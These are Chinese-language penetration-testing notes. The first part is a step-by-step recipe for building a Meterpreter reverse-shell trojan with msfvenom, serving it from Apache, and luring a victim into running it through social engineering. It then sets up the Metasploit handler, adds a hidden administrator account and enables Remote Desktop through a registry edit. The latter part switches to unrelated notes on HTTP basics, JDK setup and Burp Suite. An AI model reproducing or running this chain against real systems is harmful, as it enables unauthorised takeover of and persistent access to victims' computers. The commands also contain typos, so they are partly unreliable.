使用kali中metasploit生成木马控制windows系统
使用kali中metasploit生成木马控制windows系统
kali基于debin的数字取证系统,上面集成很多渗透测试工具,前身是BT5 R3(bracktrack)
其中metasploit是一个综合利用工具,极大提高攻击者的渗透效率,使用ruby开发的,使用非常方便,进入该工具的方式msfconsole,MSF依赖于postgresql数据库,在使用MSF之前要开启该数据库
step 1:生成木马,msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的ip lport=5555 -f exe > /root/desktop/evilshell.exe
-p 参数后跟上payload,攻击成功之后要做什么事情
lhost 后跟监听的IP
ipore 后跟监听的端口
-f 后跟有生成后门文件的类型
> 重定向
step 2:将木马文件evilshell.exe 拷贝到/var/www/html, 开启apache服务,在肉鸡上打开浏览器访问站点 kali的ip
step 3:开启MSF, msfconsole(提前查看postgresql)
=[ metasploit v5.0.46-dev ]
+ -- --=[ 1921 exploits - 1075 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion ]
exploits 开发利用 攻击默写服务 平台 系统等用到的工具
payloads 载荷载体 攻击成功之后要操作什么
msf>use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) >show options
msf exploit(handler) >set lhost 192.168.130.136
msf exploit(handler) >set lport 5555
msf exploit(handler) >run
step 4:在肉鸡中诱导用户点击exe程序 (社会工程学攻击),在kali中就会得到肉鸡的shell(meterpreter)
meterpreter>shell
ipconfig
net user hacker$ 19961206a /add
net local group administrators hacker$ /add
在kali重新开启一个终端,rdesktop 192.168.130.135
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 打开远程桌面
http协议基础
工具的介绍
JDK是java的软件开发工具包 方便我们在本地运行java开发的工具
win10配置环境变量:计算机--属性--高级系统设置--高级--环境变量--path(在最后的空白行中直接输入程序的安装路径)
验证 java-version
burpsuite 渗透测试神奇 使用java开发 功能齐全 方便渗透测试人员去测试web站点
功能:爬虫 扫描 拦包 重发 爆破 解码和编码 比较等等
HTTP协议特点
简单快速, 请求方式有 get post head等8种
无连接无状态
支持模式有B/S C/S(websocket)
URL,全称 统一资源定位符,在网络中用来标识某处的资源
http(协议)://www.baidu.com(域名):8080(端口)/news(虚拟目录)/index.php(文件名部分)?parameter=deal&id=35&do=add(三个参数)#name(锚部分)
请求包 request=请求行+请求头+空行+请求数据
http1.0 get post head
http1.1 get post head deng 8种
打开firefox 找到foxproxy